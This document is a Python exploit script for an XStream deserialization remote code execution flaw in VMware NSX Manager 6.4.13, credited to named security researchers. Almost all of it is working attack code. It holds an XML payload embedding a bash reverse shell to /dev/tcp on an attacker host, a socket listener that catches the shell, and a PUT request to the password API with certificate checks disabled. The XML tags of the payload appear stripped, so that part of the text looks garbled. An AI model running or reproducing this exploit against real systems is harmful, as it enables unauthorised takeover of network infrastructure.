#!/usr/bin/env python3 """ VMWare NSX Manager XStream Deserialization of Untrusted Data Remote Code Execution Vulnerability Version: 6.4.13-19307994 File: VMware-NSX-Manager-6.4.13-19307994-disk1.vmdk SHA1: f828eccd50d5f32500fb1f7a989d02bddf705c45 Found by: Sina Kheirkhah of MDSec and Steven Seeley of Source Incite """ import socket import sys import requests from telnetlib import Telnet from threading import Thread from urllib3 import disable_warnings, exceptions disable_warnings(exceptions.InsecureRequestWarning) xstream = """ foo

java.lang.Comparable bash -c bash -i >& /dev/tcp/{rhost}/{rport} 0>&1 start

""" def handler(lp): print(f"(+) starting handler on port {lp}") t = Telnet() s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind(("0.0.0.0", lp)) s.listen(1) conn, addr = s.accept() print(f"(+) connection from {addr[0]}") t.sock = conn print("(+) pop thy shell!") t.interact() if __name__ == "__main__": if len(sys.argv) != 3: print(f"(+) usage: {sys.argv[0]} ") print(f"(+) eg: {sys.argv[0]} 192.168.18.135 172.18.182.204:1234") sys.exit(1) target = sys.argv[1] rhost = sys.argv[2] rport = 1234 if ":" in sys.argv[2]: assert sys.argv[2].split(":")[1].isdigit(), "(-) didnt supply a valid port" rport = int(sys.argv[2].split(":")[1]) rhost = sys.argv[2].split(":")[0] handlerthr = Thread(target=handler, args=[rport]) handlerthr.start() # trigger rce requests.put( f"https://{target}/api/2.0/services/usermgmt/password/1337", data=xstream.format(rhost=rhost, rport=rport), headers={ 'Content-Type': 'application/xml' }, verify=False )